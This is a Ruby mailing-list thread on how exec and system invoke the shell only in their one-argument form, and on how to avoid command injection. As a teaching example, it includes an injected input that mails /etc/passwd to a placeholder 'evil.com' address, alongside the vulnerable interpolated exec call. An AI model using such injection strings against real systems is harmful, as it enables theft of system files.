Ruby's Kernel::exec (and system and %x)

> The problem is that `` and system() make calls to the shell. He is
> trying to NOT have a call to a shell.

Which I don't really see the reason for. I know I spouted off in
another thread about "standing on the shoulders of others", but I do
think it's alright to trust certain types of software. Point being...

Calls to a shell -- of your choice -- shouldn't be considered a bad thing.

Calls to a shell are a VERY bad thing if used incorrectly.

Read up on all of the various security problems related to SQL
injection for a reason why someone who understands how a shell works
would want to avoid one.

Here is one example to get you going. Pretend that you have a program
called "tolower" and that program takes in a single argument as a
string. Pretend that this program simply prints the string to stdout,
with all upper case characters converted to lower case.

Now, pretend that you have to implement a routine that takes in a
string (from any input source - pretend it comes from a malicious
user) and passes it to "tolower".

The right answer (because it does not use the shell):

  exec("tolower", str)

The wrong answer (because it uses the shell and doesn't escape
anything):

  exec("tolower #{str}")

Not only is the first option faster (no shell is invoked), but it is
also safer. Imagine this:

  str = "FOO; mail bad@evil.com < /etc/passwd"

What happens? In the first case, that exact string is passed to
"tolower" and "tolower" simply will print:

  foo; mail bad@evil.com < /etc/passwd

but NOTHING will be executed that is malicious.

In the second example above, the shell is invoked to parse the
command, and your information is mailed out without your knowledge.
All "tolower" will see is "FOO".

The moral of the story is to avoid subs-hells whenever possible. If
you don't need one, don't use one. Explicitly code defensively to
avoid one. Your code will be faster and more correct and immune to
certain attacks.

-JJ

I believe:

system(cmd, "http://www.google.com")

would also skip the shell entirely, since you are providing more than
one argument to system.

Correct. It is only the one argument form that uses the shell.

Seems like a dodgy sort of design to me. I gather it comes from
trying to merge system() and exec() from the C library, probably for
systems that don't have a concept of fork(). From JJ's post, I gather
that Perl might be the source of this chimera.

I wish popular languages would think about these decisions. Two APIs
for this would be much better.

The first could be Kernel::exec, and would simply run the process
given. No shell interpretation would ever be done on the argument(s).
Give it one string, and that's the program it runs. Give it multiple
strings to pass multiple arguments.

In fact, I'm willing to bet that 99% of the time, one already has the
command and arguments separated into a list, and one rarely if ever
wants to use the one-argument-use-the-shell form of exec (or system).

A second routine, "Kernel::exec_cmd" let's call it, could take in
exactly one string, and would pass it through the platform's command
interpreter. This would be documented with all the ugly warnings that
are required so people don't write

  exec_cmd( "ls #{user_input}" )

The confusion that could be cleared up by separating these out is a
big win I think. Another benefit is that the Unix implementation of
exec_cmd could simply be

  exec( "/bin/sh", "-c", arg)

-JJ

system() always go to a shell.

···

On Jan 8, 2008, at 11:22 AM, Gary Wright wrote:

I just wanted to point out that if you are passing arguments to the program you can use:

  system(cmd, arg1, arg2)

How would one pass args here, though?
exec( ["/usr/bin/ls", "ls"], "-al")

Is that right?

Yes, that is right. You can also use the simple form

  exec( "/usr/bin/ls", "-al" )

(or wherever your ls lives). Two or more arguments to "exec" forces
non-shell mode.

-JJ

The first could be Kernel::exec, and would simply run the process
given. No shell interpretation would ever be done on the argument(s).
Give it one string, and that's the program it runs. Give it multiple
strings to pass multiple arguments.

Yes, but in the Unix/C world exec() replaces the existing program and so exec() without fork() is a not-so-useful combination. For whatever reason it came to pass that Kernel#exec on windows is actually a Windows version of fork/exec making exec
non-portable.

A second routine, "Kernel::exec_cmd" let's call it, could take in
exactly one string, and would pass it through the platform's command
interpreter. This would be documented with all the ugly warnings that
are required so people don't write

You are describing "Kernel::system" without the funny two-element array caveat.

I think a better partitioning of the problem would be:

   fork/exec: craft what you need, only available on *nix systems
   system: execute a command line via the command-interpreter
   run: execute a program *without* using the command-interpreter

I just made up the name 'run'. I don't think there are standards that specify such an interface, which is why exec/system have been munged, I guess.

Gary Wright

···

On Jan 8, 2008, at 3:19 PM, JJ wrote:

So do you have a solution for executing a file with no args? Or is:
exec([cmd, cmd]) the preferred one?

BTW, I meant
  exec([cmd, ""]) instead of exec(cmd, "")

···

On Jan 8, 2008, at 9:49 AM, JJ wrote:

The right answer (because it does not use the shell):

  exec("tolower", str)

Then I retract my previous statement! Thank you!

···

On Jan 8, 2008, at 3:19 PM, JJ wrote:

I believe:

system(cmd, "http://www.google.com")

would also skip the shell entirely, since you are providing more than
one argument to system.

Correct. It is only the one argument form that uses the shell.

system() always go to a shell.

No, not true. system() always lets the Ruby process continue on after
the sub-program is finished, but a system() with two or more arguments
doesn't run any shell. It runs the sub-program directly as a child.

The same rules apply to exec() and system() that have been discussed
in this thread.

-JJ

> The first could be Kernel::exec, and would simply run
> the process given. No shell interpretation would ever
> be done on the argument(s).
>
> Give it one string, and that's the program it runs.
>
> Give it multiple strings to pass multiple arguments.

Yes, but in the Unix/C world exec() replaces the
existing program and so exec() without fork() is a
not-so-useful combination.

Well, I argue that exec() without fork() is useful in any world, but
it may not be available in some. It can be poorly emulated by
CreateProcess() and exit().

My point was not this though; it was simply that instead of having one
routine behave in two very different ways (exec via shell and exec
directly), there should have been two routines. Getting those confused
is the source of many, many bugs.

I would bet that any piece of code you gave me in Perl or Ruby (or any
other language that supports this idiom) that used system() or exec()
would have a very high chance of containing bugs related to this very
problem. I've seen it all the time.

I think a better partitioning of the problem would be:

   fork/exec: craft what you need, only available on
               *nix systems
   system: execute a command line via the
               command-interpreter
   run: execute a program *without* using the
               command-interpreter

Well, my exec and exec_cmd suggestions were meant to have analogs of
system and system_cmd that did the implicit fork on unix. My exec is
like your first exec, except there are two - one via the shell and one
via the system call.

My system is like your system, and my system_cmd is like your run.
We're speaking the same language; just using different words.

-JJ